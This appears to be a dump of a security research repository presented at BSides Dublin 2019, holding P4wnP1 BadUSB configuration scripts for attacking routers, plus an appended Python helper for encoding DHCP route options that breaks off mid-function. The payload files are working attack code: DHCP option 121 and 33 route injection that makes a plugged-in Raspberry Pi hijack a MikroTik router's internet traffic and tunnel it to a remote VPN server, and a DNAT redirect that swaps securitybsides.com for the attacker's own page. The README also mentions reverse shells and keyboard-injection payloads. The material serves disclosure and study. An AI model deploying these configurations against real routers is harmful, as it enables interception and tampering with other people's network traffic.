[
  {
    "path": ".github/CODEOWNERS",
    "content": "* @tenable/zero-day @tenable/infosec\n"
  },
  {
    "path": "README.md",
    "content": "# BadUSB in Routers\nMaterial found in this repository was originally presented at [BSides Dublin](https://www.bsidesdub.ie/) on March 23, 2019. The slides are included here in PDF format.\n\nThis repository contains configuration files for [P4wnP1](https://github.com/mame82/P4wnP1), a BadUSB framework for the Raspberry Pi. The configuration files allow an attacker to execute BadUSB-style attacks on certain routers.\n\nThe following hardware and software were used for the BadUSB attacks:\n\n* Raspberry Pi Zero\n* USB-A Addon\n* 8 GB microSD\n* Raspbian Stretch (Version: November 2018)\n* P4wnP1 (Version: [9c8cc09a6503f10309c04310c3bba9c07caab8b7](https://github.com/mame82/P4wnP1/tree/9c8cc09a6503f10309c04310c3bba9c07caab8b7))\n\n<img src=\"/images/pi.jpg\" height=\"25%\" width=\"25%\" />\n\n---\n\n## mikrotik_mitm\n\n<img src=\"/images/mikrotik_pi.jpg\" height=\"50%\" width=\"50%\" />\n\nThe mikrotik_mitm directory contains configuration files to man-in-the-middle outbound traffic from RouterOS LAN hosts. The configuration files were tested using RouterOS on an hAP with the default configuration on 6.44.1 Stable. Presumably, it works on any RouterOS-based router that supports 4G USB functionality. The Pi presents itself as a USB Ethernet device and answers the router's DHCP request with a default gateway (option 3) and a list of classless static routes (option 121) whose next hop is the Pi, so all internet-bound traffic (apart from a few address ranges the prefix list in the payload leaves out) is routed to the Raspberry Pi plugged into the USB port. The Pi will forward all of the internet traffic to a remote VPN server.\n\n*PoC Video:*\n\n[![PoC Video](http://img.youtube.com/vi/3X7xrgan5Tk/0.jpg)](http://www.youtube.com/watch?v=3X7xrgan5Tk)\n\nAs written, the \"remote\" VPN server is at 192.168.1.64. If you are going to try this out for yourself, you'll need to adjust the OpenVPN connection and possibly the iptables / DHCP options depending on where your VPN server is. The VPN server configuration is fairly simple. Note that with no key or TLS configured and `--auth none` the tunnel is neither encrypted nor authenticated, and the FORWARD rules accept everything on tun0; that is fine for a lab and nothing else:\n\n```sh\nsudo sysctl -w net.ipv4.ip_forward=1\nsudo openvpn --ifconfig 10.200.0.1 10.200.0.2 --dev tun --auth none\nsudo iptables -I FORWARD -i tun0 -j ACCEPT\nsudo iptables -I FORWARD -o tun0 -j ACCEPT\nsudo iptables -t nat -A POSTROUTING -j MASQUERADE\n```\n\n<img src=\"/images/mitm_diagram.png\" height=\"50%\" width=\"50%\" />\n\nAs mentioned, RouterOS will recognize the USB device using the default configuration. However! For some reason, the router won't recognize the Pi until you first plug in something else. You only have to do it once and then you are good until the router reboots. I'm not sure of the root cause of this. I've been using this ethernet adapter (you can find it on Amazon):\n\n<img src=\"/images/usb_enet_adapter.jpg\" height=\"25%\" width=\"25%\" />\n\n---\n\n## mikrotik_wan_lan_access\n\nThis is a non-MITM version of the MikroTik attack. The Pi will be assigned 192.168.4.1 and it should have access to both the WAN and LAN. LAN devices should also be able to reach the Pi. This is kind of useful if you just want to plug in your Pi as some type of local server... or if you want a reverse shell out to the internet.\n\n---\n\n## asus_bsides_routing_table\n\n<img src=\"/images/asus_pi.jpg\" height=\"50%\" width=\"50%\" />\n\nThe asus_bsides_routing_table directory contains configuration files to hijack traffic bound for http://securitybsides.com. The attack relies on the ability of a USB WAN device to insert arbitrary entries into the router's routing table via DHCP options: the Pi's DHCP server hands the router classic static routes (option 33) for the site's addresses with the Pi as the next hop, and the Pi then redirects port 80 to its own web server.\n\nThis attack was tested against an Asus RT-AC51U with load-balancing dual WAN configured.\n\n*PoC Video:*\n\n[![PoC Video](http://img.youtube.com/vi/LvWo8fUaJdo/0.jpg)](http://www.youtube.com/watch?v=LvWo8fUaJdo)\n\n---\n\n## Traditional Attacks over IP\n\n<img src=\"/images/netgear_pi.jpg\" height=\"40%\" width=\"40%\" />\n\nA variety of routers support printer sharing (Netgear, Linksys, and TP-Link). The way this works is that you plug your USB printer into the router and then you install client software on your LAN host which gives it the ability to talk to the printer via the router.\n\nI've found that the router/client software will actually communicate with pretty much any USB device. For whatever reason, the device makers didn't limit the functionality to printers only.\n\nAs such, an attacker can execute any of the normal payloads that come with P4wnP1. In my PoC video, I'm using hid_keyboard2.txt. The downside to this attack is that it requires that special software be installed and that the user actually click \"connect\".\n\n*PoC Video:*\n\n[![PoC Video](http://img.youtube.com/vi/aoaB6hiHGiM/0.jpg)](http://www.youtube.com/watch?v=aoaB6hiHGiM)\n"
  },
  {
    "path": "asus_bsides_routing_table/boot/init_usb_ethernet.sh",
    "content": "#!/bin/sh\n\n\n#    This file is part of P4wnP1.\n#\n#    Copyright (c) 2017, Marcus Mengs. \n#\n#    P4wnP1 is free software: you can redistribute it and/or modify\n#    it under the terms of the GNU General Public License as published by\n#    the Free Software Foundation, either version 3 of the License, or\n#    (at your option) any later version.\n#\n#    P4wnP1 is distributed in the hope that it will be useful,\n#    but WITHOUT ANY WARRANTY; without even the implied warranty of\n#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#    GNU General Public License for more details.\n#\n#    You should have received a copy of the GNU General Public License\n#    along with P4wnP1.  If not, see <http://www.gnu.org/licenses/>.\n\n\n#\n# Functions to init USB ethernet\n#\t- detect correct interface (ECM / RNDIS) --> exported to $active_interface\n#\t- create dnsmasq DHCP configuration for interface\n#\t- in this copy, ROUTE_SPOOF=true makes the DHCP config carry classic static routes (option 33)\n#\t  for 104.18.54.114 and 104.18.55.114 with the Pi as next hop\n\n\n\n# =================================\n# Network init\n# =================================\nfunction detect_active_interface()\n{\n\n\n\t# Waiting for one of the interfaces to get a link (either RNDIS or ECM)\n\t#    the loop runs until link is detected (the $RETRY_COUNT_LINK_DETECTION bound is commented out below)\n\t#    note: if a loop count is used and is too low, windows may not have enough time to install drivers\n\n\t# ToDo: check if operstate could be used for this, without waiting for carrier\n\tactive_interface=\"none\"\n\n\t# if RNDIS and ECM are active check which gets link first\n\t# Note: Detection for RNDIS (usb0) is done first. In case it is active, link availability\n\t#\tfor ECM (usb1) is checked anyway (in case both interfaces got link). This is done\n\t#\tto use ECM as preferred interface on MacOS and Linux if both, RNDIS and ECM, are supported.\n\tif $USE_RNDIS && $USE_ECM; then\n\t\t# bring up both interfaces to check for physical link\n\t\tifconfig usb0 up\n\t\tifconfig usb1 up\n\n\t\techo \"CDC ECM and RNDIS active. Check which interface has to be used via Link detection\"\n\t\twhile [ \"$active_interface\" == \"none\" ]; do\n\t\t#while [[ $count -lt $RETRY_COUNT_LINK_DETECTION ]]; do\n\t\t\tprintf \".\"\n\n\t\t\tif [[ $(</sys/class/net/usb0/carrier) == 1 ]]; then\n\t\t\t\t# special case: macOS/Linux Systems detecting RNDIS should use CDC ECM anyway\n\t\t\t\t# make sure ECM hasn't come up, too\n\t\t\t\tsleep 0.5\n\t\t\t\tif [[ $(</sys/class/net/usb1/carrier) == 1 ]]; then\n\t\t\t\t\techo \"Link detected on usb1\"; sleep 2\n\t\t\t\t\tactive_interface=\"usb1\"\n\t\t\t\t\tifconfig usb0 down\n\n\t\t\t\t\tbreak\n\t\t\t\tfi\n\n\t\t\t\techo \"Link detected on usb0\"; sleep 2\n\t\t\t\tactive_interface=\"usb0\"\n\t\t\t\tifconfig usb1 down\n\n\t\t\t\tbreak\n\t\t\tfi\n\n\t\t\t# check ECM for link\n\t\t\tif [[ $(</sys/class/net/usb1/carrier) == 1 ]]; then\n\t\t\t\techo \"Link detected on usb1\"; sleep 2\n\t\t\t\tactive_interface=\"usb1\"\n\t\t\t\tifconfig usb0 down\n\n\t\t\t\tbreak\n\t\t\tfi\n\n\n\t\t\tsleep 0.5\n\t\tdone\n\tfi\n\n\t# if either one, RNDIS or ECM, is active, wait for link on it (the single gadget interface is always usb0)\n\tif ($USE_RNDIS && ! $USE_ECM) || (! $USE_RNDIS && $USE_ECM); then \n\t\t# bring up interface\n\t\tifconfig usb0 up\n\n\t\techo \"CDC ECM or RNDIS active. Check which interface has to be used via Link detection\"\n\t\twhile [ \"$active_interface\" == \"none\" ]; do\n\t\t\tprintf \".\"\n\n\t\t\tif [[ $(</sys/class/net/usb0/carrier) == 1 ]]; then\n\t\t\t\techo \"Link detected on usb0\"; sleep 2\n\t\t\t\tactive_interface=\"usb0\"\n\t\t\t\tbreak\n\t\t\tfi\n\t\tdone\n\tfi\n\n\n\t# setup active interface with correct IP\n\tif [ \"$active_interface\" != \"none\" ]; then\n\t\tifconfig $active_interface $IF_IP netmask $IF_MASK\n\tfi\n\n\n\t# if active_interface not \"none\" (RNDIS or CDC ECM are running)\n#\tif [ \"$active_interface\" != \"none\" ]; then\n#\t\t# setup DHCP server\n#\t\tstart_DHCP_server\n#\n#\t\t# call onNetworkUp() from payload\n#\t\tdeclare -f onNetworkUp > /dev/null && onNetworkUp\n#\n#\t\t# wait for client to receive DHCP lease\n#\t\ttarget_ip=\"\"\n#\t\twhile [ \"$target_ip\" == \"\" ]; do\n#\t\t\ttarget_ip=$(cat /tmp/dnsmasq.leases | cut -d\" \" -f3)\n#\t\tdone\n#\n#\t\t# call onTargetGotIP() from payload\n#\t\tdeclare -f onTargetGotIP > /dev/null && onTargetGotIP\n#\tfi\n\n}\n\nfunction create_DHCP_config()\n{\n\t# create DHCP config file for dnsmasq\n\techo \"P4wnP1: Creating DHCP configuration for Ethernet over USB...\"\n\n\t\tcat <<- EOF > /tmp/dnsmasq_usb_eth.conf\n\t\t\tbind-interfaces\n\t\t\tport=0\n\t\t\tinterface=$active_interface\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m\n\n\t\tEOF\n\n\t\tif $ROUTE_SPOOF; then\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\t# router\n\t\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t\t# DNS\n\t\t\t\tdhcp-option=6,$IF_IP\n\n\t\t\t\t# NETBIOS NS\n\t\t\t\tdhcp-option=44,$IF_IP\n\t\t\t\tdhcp-option=45,$IF_IP\n\n\t\t\t\t# classic static routes (option 33) for 104.18.54.114 and 104.18.55.114, next hop = the Pi\n\t\t\t\tdhcp-option=33,104.18.54.114,$IF_IP,104.18.55.114,$IF_IP\n\t\t\tEOF\n\t\telse\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\t# router disable DHCP gateway announcement\n\t\t\t\tdhcp-option=3\n\n\t\t\t\t# disable DNS settings\n\t\t\t\tdhcp-option=6\n\t\t\tEOF\n\t\tfi\n\n\t\tif $WPAD_ENTRY; then\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\t\t\tEOF\n\t\tfi\n\n\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\n}\n\nfunction start_DHCP_server()\n{\n\n\t# recreate DHCP config\n\tif $ROUTE_SPOOF; then\n\t\t# DHCP config with static route spoofing\n\t\tcat <<- EOF > $wdir/dnsmasq.conf\n\t\t\tport=0\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,1m\n\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\n\t\t\t# router\n\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t# DNS\n\t\t\tdhcp-option=6,$IF_IP\n\n\t\t\t# NETBIOS NS\n\t\t\tdhcp-option=44,$IF_IP\n\t\t\tdhcp-option=45,$IF_IP\n\n\t\t\t# classic static routes (option 33) for 104.18.54.114 and 104.18.55.114, next hop = the Pi\n\t\t\tdhcp-option=33,104.18.54.114,$IF_IP,104.18.55.114,$IF_IP\n\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\telse\n\t\t# DHCP config without static route spoofing\n\t\tcat <<- EOF > $wdir/dnsmasq.conf\n\t\t\tport=0\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m\n\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\n\t\t\t# router\n\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t# DNS\n\t\t\tdhcp-option=6,$IF_IP\n\n\t\t\t# NETBIOS NS\n\t\t\tdhcp-option=44,$IF_IP\n\t\t\tdhcp-option=45,$IF_IP\n\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\tfi;\n\n\n\t# start access point if needed\n\tif $WIFI && $ACCESS_POINT; then\n\t\t# start ACCESS POINT\n\t\thostapd $wdir/wifi/hostapd.conf > /dev/null &\n\t\t# configure interface\n\t\tifconfig wlan0 172.24.0.1 netmask 255.255.255.252\n\t\t# start DHCP server for WLAN interface and RNDIS/CDC ECM\n\t\tdnsmasq -C $wdir/dnsmasq.conf -C $wdir/wifi/dnsmasq_wifi.conf\n\telse\n\n\t\t# start DHCP server (listening on IF_IP)\n\t\tdnsmasq -C $wdir/dnsmasq.conf\n\tfi\n}"
  },
  {
    "path": "asus_bsides_routing_table/payloads/asus_bsides_routing_table.txt",
    "content": "# USB VID & PID. See: http://www.linux-usb.org/usb.ids\nUSB_VID=\"0x1D6B\"  # Linux Foundation\nUSB_PID=\"0x0103\"  # NCM (Ethernet) Gadget\n\n# Gadget features\nUSE_ECM=true     # if true CDC ECM will be enabled\nUSE_RNDIS=true   # if true RNDIS will be enabled\nUSE_HID=false    # if true HID (keyboard) will be enabled\nUSE_RAWHID=false # if true HID raw device will be enabled\nUSE_UMS=false    # if true USB Mass Storage will be enabled\n\n# push static routes for the securitybsides.com addresses to the router via DHCP option 33 (see: init_usb_ethernet.sh)\nROUTE_SPOOF=true\n\n# Network and DHCP options for Ethernet over USB\nIF_IP=\"192.168.4.1\" \nIF_MASK=\"255.255.255.252\" \nIF_DHCP_RANGE=\"192.168.4.2,192.168.4.2\"\n\nfunction onNetworkUp()\n{\n\t# redirect HTTP arriving from the router on whichever USB interface got link (usb0 or usb1) to the Pi's own web server\n\tiptables -t nat -A PREROUTING -i $active_interface -p tcp --dport 80 -j DNAT --to 192.168.4.1\n\n\tip route add 0.0.0.0/0 dev $active_interface\n\troute add default gw 192.168.4.2\n\n\t# serve a placeholder page in place of securitybsides.com\n\tmkdir -p /home/pi/html/\n\tcd /home/pi/html/\n\techo \"<html><body><h3>lol</h3></body></html>\" > index.html\n\tpython -m SimpleHTTPServer 80 &\n}\n"
  },
  {
    "path": "mikrotik_mitm/boot/init_usb_ethernet.sh",
    "content": "#!/bin/sh\n\n\n#    This file is part of P4wnP1.\n#\n#    Copyright (c) 2017, Marcus Mengs. \n#\n#    P4wnP1 is free software: you can redistribute it and/or modify\n#    it under the terms of the GNU General Public License as published by\n#    the Free Software Foundation, either version 3 of the License, or\n#    (at your option) any later version.\n#\n#    P4wnP1 is distributed in the hope that it will be useful,\n#    but WITHOUT ANY WARRANTY; without even the implied warranty of\n#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n#    GNU General Public License for more details.\n#\n#    You should have received a copy of the GNU General Public License\n#    along with P4wnP1.  If not, see <http://www.gnu.org/licenses/>.\n\n\n#\n# Functions to init USB ethernet\n#\t- detect correct interface (ECM / RNDIS) --> exported to $active_interface\n#\t- create dnsmasq DHCP configuration for interface\n#\t- in this copy, ROUTE_SPOOF=true makes the DHCP config carry classless static routes (option 121, RFC 3442)\n#\t  for most of the IPv4 space with the Pi as next hop; a client that honors option 121 ignores option 3\n\n\n\n# =================================\n# Network init\n# =================================\nfunction detect_active_interface()\n{\n\n\n\t# Waiting for one of the interfaces to get a link (either RNDIS or ECM)\n\t#    the loop runs until link is detected (the $RETRY_COUNT_LINK_DETECTION bound is commented out below)\n\t#    note: if a loop count is used and is too low, windows may not have enough time to install drivers\n\n\t# ToDo: check if operstate could be used for this, without waiting for carrier\n\tactive_interface=\"none\"\n\n\t# if RNDIS and ECM are active check which gets link first\n\t# Note: Detection for RNDIS (usb0) is done first. In case it is active, link availability\n\t#\tfor ECM (usb1) is checked anyway (in case both interfaces got link). This is done\n\t#\tto use ECM as preferred interface on MacOS and Linux if both, RNDIS and ECM, are supported.\n\tif $USE_RNDIS && $USE_ECM; then\n\t\t# bring up both interfaces to check for physical link\n\t\tifconfig usb0 up\n\t\tifconfig usb1 up\n\n\t\techo \"CDC ECM and RNDIS active. Check which interface has to be used via Link detection\"\n\t\twhile [ \"$active_interface\" == \"none\" ]; do\n\t\t#while [[ $count -lt $RETRY_COUNT_LINK_DETECTION ]]; do\n\t\t\tprintf \".\"\n\n\t\t\tif [[ $(</sys/class/net/usb0/carrier) == 1 ]]; then\n\t\t\t\t# special case: macOS/Linux Systems detecting RNDIS should use CDC ECM anyway\n\t\t\t\t# make sure ECM hasn't come up, too\n\t\t\t\tsleep 0.5\n\t\t\t\tif [[ $(</sys/class/net/usb1/carrier) == 1 ]]; then\n\t\t\t\t\techo \"Link detected on usb1\"; sleep 2\n\t\t\t\t\tactive_interface=\"usb1\"\n\t\t\t\t\tifconfig usb0 down\n\n\t\t\t\t\tbreak\n\t\t\t\tfi\n\n\t\t\t\techo \"Link detected on usb0\"; sleep 2\n\t\t\t\tactive_interface=\"usb0\"\n\t\t\t\tifconfig usb1 down\n\n\t\t\t\tbreak\n\t\t\tfi\n\n\t\t\t# check ECM for link\n\t\t\tif [[ $(</sys/class/net/usb1/carrier) == 1 ]]; then\n\t\t\t\techo \"Link detected on usb1\"; sleep 2\n\t\t\t\tactive_interface=\"usb1\"\n\t\t\t\tifconfig usb0 down\n\n\t\t\t\tbreak\n\t\t\tfi\n\n\n\t\t\tsleep 0.5\n\t\tdone\n\tfi\n\n\t# if either one, RNDIS or ECM, is active, wait for link on it (the single gadget interface is always usb0)\n\tif ($USE_RNDIS && ! $USE_ECM) || (! $USE_RNDIS && $USE_ECM); then \n\t\t# bring up interface\n\t\tifconfig usb0 up\n\n\t\techo \"CDC ECM or RNDIS active. Check which interface has to be used via Link detection\"\n\t\twhile [ \"$active_interface\" == \"none\" ]; do\n\t\t\tprintf \".\"\n\n\t\t\tif [[ $(</sys/class/net/usb0/carrier) == 1 ]]; then\n\t\t\t\techo \"Link detected on usb0\"; sleep 2\n\t\t\t\tactive_interface=\"usb0\"\n\t\t\t\tbreak\n\t\t\tfi\n\t\tdone\n\tfi\n\n\n\t# setup active interface with correct IP\n\tif [ \"$active_interface\" != \"none\" ]; then\n\t\tifconfig $active_interface $IF_IP netmask $IF_MASK\n\tfi\n\n\n\t# if active_interface not \"none\" (RNDIS or CDC ECM are running)\n#\tif [ \"$active_interface\" != \"none\" ]; then\n#\t\t# setup DHCP server\n#\t\tstart_DHCP_server\n#\n#\t\t# call onNetworkUp() from payload\n#\t\tdeclare -f onNetworkUp > /dev/null && onNetworkUp\n#\n#\t\t# wait for client to receive DHCP lease\n#\t\ttarget_ip=\"\"\n#\t\twhile [ \"$target_ip\" == \"\" ]; do\n#\t\t\ttarget_ip=$(cat /tmp/dnsmasq.leases | cut -d\" \" -f3)\n#\t\tdone\n#\n#\t\t# call onTargetGotIP() from payload\n#\t\tdeclare -f onTargetGotIP > /dev/null && onTargetGotIP\n#\tfi\n\n}\n\nfunction create_DHCP_config()\n{\n\t# create DHCP config file for dnsmasq\n\techo \"P4wnP1: Creating DHCP configuration for Ethernet over USB...\"\n\n\t\tcat <<- EOF > /tmp/dnsmasq_usb_eth.conf\n\t\t\tbind-interfaces\n\t\t\tport=0\n\t\t\tinterface=$active_interface\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m\n\n\t\tEOF\n\n\t\tif $ROUTE_SPOOF; then\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\t# router\n\t\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t\t# classless static routes (option 121) for most of the IPv4 space, next hop = the Pi\n\t\t\t\t# (10.0.0.0/8, 192.0.0.0/8 and 252.0.0.0/6 are left out)\n\t\t\t\tdhcp-option=121,0.0.0.0/5,$IF_IP,8.0.0.0/7,$IF_IP,11.0.0.0/8,$IF_IP,12.0.0.0/6,$IF_IP,16.0.0.0/4,$IF_IP,32.0.0.0/3,$IF_IP,64.0.0.0/2,$IF_IP,128.0.0.0/2,$IF_IP,193.0.0.0/8,$IF_IP,194.0.0.0/7,$IF_IP,196.0.0.0/6,$IF_IP,200.0.0.0/5,$IF_IP,208.0.0.0/4,$IF_IP,224.0.0.0/4,$IF_IP,240.0.0.0/5,$IF_IP,248.0.0.0/6,$IF_IP\n\t\t\tEOF\n\t\telse\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\t# router disable DHCP gateway announcement\n\t\t\t\tdhcp-option=3\n\n\t\t\t\t# disable DNS settings\n\t\t\t\tdhcp-option=6\n\t\t\tEOF\n\t\tfi\n\n\t\tif $WPAD_ENTRY; then\n\t\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\t\t\tEOF\n\t\tfi\n\n\t\tcat <<- EOF >> /tmp/dnsmasq_usb_eth.conf\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\n}\n\nfunction start_DHCP_server()\n{\n\n\t# recreate DHCP config\n\tif $ROUTE_SPOOF; then\n\t\t# DHCP config with static route spoofing\n\t\tcat <<- EOF > $wdir/dnsmasq.conf\n\t\t\tport=0\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,1m\n\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\n\t\t\t# router\n\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t# classless static routes (option 121) for most of the IPv4 space, next hop = the Pi\n\t\t\t# (10.0.0.0/8, 192.0.0.0/8 and 252.0.0.0/6 are left out)\n\t\t\tdhcp-option=121,0.0.0.0/5,$IF_IP,8.0.0.0/7,$IF_IP,11.0.0.0/8,$IF_IP,12.0.0.0/6,$IF_IP,16.0.0.0/4,$IF_IP,32.0.0.0/3,$IF_IP,64.0.0.0/2,$IF_IP,128.0.0.0/2,$IF_IP,193.0.0.0/8,$IF_IP,194.0.0.0/7,$IF_IP,196.0.0.0/6,$IF_IP,200.0.0.0/5,$IF_IP,208.0.0.0/4,$IF_IP,224.0.0.0/4,$IF_IP,240.0.0.0/5,$IF_IP,248.0.0.0/6,$IF_IP\n\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\telse\n\t\t# DHCP config without static route spoofing\n\t\tcat <<- EOF > $wdir/dnsmasq.conf\n\t\t\tport=0\n\t\t\tlisten-address=$IF_IP\n\t\t\tdhcp-range=$IF_DHCP_RANGE,$IF_MASK,5m\n\t\t\tdhcp-option=252,http://$IF_IP/wpad.dat\n\n\t\t\t# router\n\t\t\tdhcp-option=3,$IF_IP\n\n\t\t\t# DNS\n\t\t\tdhcp-option=6,$IF_IP\n\n\t\t\t# NETBIOS NS\n\t\t\tdhcp-option=44,$IF_IP\n\t\t\tdhcp-option=45,$IF_IP\n\n\t\t\tdhcp-leasefile=/tmp/dnsmasq.leases\n\t\t\tdhcp-authoritative\n\t\t\tlog-dhcp\n\t\tEOF\n\tfi;\n\n\n\t# start access point if needed\n\tif $WIFI && $ACCESS_POINT; then\n\t\t# start ACCESS POINT\n\t\thostapd $wdir/wifi/hostapd.conf > /dev/null &\n\t\t# configure interface\n\t\tifconfig wlan0 172.24.0.1 netmask 255.255.255.252\n\t\t# start DHCP server for WLAN interface and RNDIS/CDC ECM\n\t\tdnsmasq -C $wdir/dnsmasq.conf -C $wdir/wifi/dnsmasq_wifi.conf\n\telse\n\n\t\t# start DHCP server (listening on IF_IP)\n\t\tdnsmasq -C $wdir/dnsmasq.conf\n\tfi\n}"
  },
  {
    "path": "mikrotik_mitm/payloads/mikrotik_mitm.txt",
    "content": "# VID and PID stolen from a USB Ethernet Adapter\nUSB_VID=\"0x1D6B\" # Vendor ID\nUSB_PID=\"0x0237\" # Product ID\n\n# Gadget features\nUSE_ECM=true      # if true CDC ECM will be enabled\nUSE_RNDIS=true    # if true RNDIS will be enabled\nUSE_HID=false     # if true HID (keyboard) will be enabled\nUSE_RAWHID=false  # if true HID raw device will be enabled\nUSE_UMS=false     # if true USB Mass Storage will be enabled\n\n# add new entries to the router's routing table via DHCP option 121 (see: init_usb_ethernet.sh)\nROUTE_SPOOF=true\n\n# assign self 192.168.4.1 and the router 192.168.4.2\nIF_IP=\"192.168.4.1\" \nIF_MASK=\"255.255.255.252\" \nIF_DHCP_RANGE=\"192.168.4.2,192.168.4.2\"\n\nfunction onNetworkUp()\n{\n\t# everything eventually goes to the router\n\troute add default gw 192.168.4.2\n\n\t# enable forwarding and be sure to ignore redirects\n\t# (key=value must be a single argument; written with spaces, sysctl parses three separate arguments and sets nothing)\n\tsysctl -w net.ipv4.ip_forward=1\n\tsysctl -w net.ipv4.conf.all.accept_redirects=0\n\t\n\t# connect to the VPN at 192.168.1.64 (no key and --auth none: the tunnel is neither encrypted nor authenticated)\n\topenvpn --ifconfig 10.200.0.2 10.200.0.1 --dev tun --auth none --remote 192.168.1.64 --daemon\n\n\t# rewrite the src ip\n\tiptables -t nat -A POSTROUTING -j MASQUERADE\n\n\t# man in the middle most of the things: the same prefixes the DHCP option 121 list pushes to the router,\n\t# sent into the tunnel. The holes are 10.0.0.0/8, 192.0.0.0/8 and 252.0.0.0/6; leaving 192.0.0.0/8 out\n\t# is what keeps the LAN and the VPN endpoint at 192.168.1.64 reachable via the router rather than the tunnel\n\troute add -net 0.0.0.0/5 gw 10.200.0.2\n\troute add -net 8.0.0.0/7 gw 10.200.0.2\n\troute add -net 11.0.0.0/8 gw 10.200.0.2\n\troute add -net 12.0.0.0/6 gw 10.200.0.2\n\troute add -net 16.0.0.0/4 gw 10.200.0.2\n\troute add -net 32.0.0.0/3 gw 10.200.0.2\n\troute add -net 64.0.0.0/2 gw 10.200.0.2\n\troute add -net 128.0.0.0/2 gw 10.200.0.2\n\troute add -net 193.0.0.0/8 gw 10.200.0.2\n\troute add -net 194.0.0.0/7 gw 10.200.0.2\n\troute add -net 196.0.0.0/6 gw 10.200.0.2\n\troute add -net 200.0.0.0/5 gw 10.200.0.2\n\troute add -net 208.0.0.0/4 gw 10.200.0.2\n\troute add -net 224.0.0.0/4 gw 10.200.0.2\n\troute add -net 240.0.0.0/5 gw 10.200.0.2\n\troute add -net 248.0.0.0/6 gw 10.200.0.2\n}\n"
  },
  {
    "path": "mikrotik_wan_lan_access/payloads/mikrotik_wan_lan_access.txt",
    "content": "# VID and PID stolen from a USB Ethernet Adapter\nUSB_VID=\"0x1D6B\" # Vendor ID\nUSB_PID=\"0x0237\" # Product ID\n\n# Gadget features\nUSE_ECM=true      # if true CDC ECM will be enabled\nUSE_RNDIS=true    # if true RNDIS will be enabled\nUSE_HID=false     # if true HID (keyboard) will be enabled\nUSE_RAWHID=false  # if true HID raw device will be enabled\nUSE_UMS=false     # if true USB Mass Storage will be enabled\n\n# Don't route extra traffic to the pi\nROUTE_SPOOF=false\n\n# assign self 192.168.4.1 and the router 192.168.4.2\nIF_IP=\"192.168.4.1\" \nIF_MASK=\"255.255.255.252\" \nIF_DHCP_RANGE=\"192.168.4.2,192.168.4.2\"\n\nfunction onNetworkUp()\n{\n\troute add default gw 192.168.4.2\n}\n\n"
  }
]
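The following is an added example, not code from the tenable repository or from P4wnP1, for the DHCP route injection that the README's mikrotik_mitm and asus_bsides_routing_table sections describe and that the `dhcp-option=121` / `dhcp-option=33` lines in the two init_usb_ethernet.sh scripts implement. It builds and parses the raw option bytes dnsmasq emits for those lines (RFC 3442 classless routes and RFC 2132 classic routes), and it computes which part of the IPv4 space the mikrotik_mitm prefix list leaves undiverted. The prefix list, the Pi address 192.168.4.1 and the two 104.18.x.114 hosts are copied from the payload files; every function name is this example's own.

```python
"""DHCP static-route option helpers (added example; not part of
tenable/router_badusb or P4wnP1).

Assumptions: MIKROTIK_PREFIXES, PI_IP and ASUS_HOSTS are copied from the
repository's payloads and init scripts; the function names are ours.
"""
import ipaddress

PI_IP = "192.168.4.1"   # IF_IP in the payloads: the Pi's USB-Ethernet address

# dhcp-option=121 prefixes from mikrotik_mitm/boot/init_usb_ethernet.sh
MIKROTIK_PREFIXES = [
    "0.0.0.0/5", "8.0.0.0/7", "11.0.0.0/8", "12.0.0.0/6", "16.0.0.0/4",
    "32.0.0.0/3", "64.0.0.0/2", "128.0.0.0/2", "193.0.0.0/8", "194.0.0.0/7",
    "196.0.0.0/6", "200.0.0.0/5", "208.0.0.0/4", "224.0.0.0/4",
    "240.0.0.0/5", "248.0.0.0/6",
]

# dhcp-option=33 destinations from asus_bsides_routing_table (securitybsides.com)
ASUS_HOSTS = ["104.18.54.114", "104.18.55.114"]


def encode_option121(routes):
    """RFC 3442 classless static routes, without the 2-byte code/length
    header. Each route is <prefix width><only the significant octets of
    the destination><4-byte router>. routes: iterable of (cidr, router)."""
    out = bytearray()
    for cidr, router in routes:
        net = ipaddress.IPv4Network(cidr)         # strict: rejects host bits
        sig = (net.prefixlen + 7) // 8            # octets carrying the prefix
        out.append(net.prefixlen)
        out += net.network_address.packed[:sig]
        out += ipaddress.IPv4Address(router).packed
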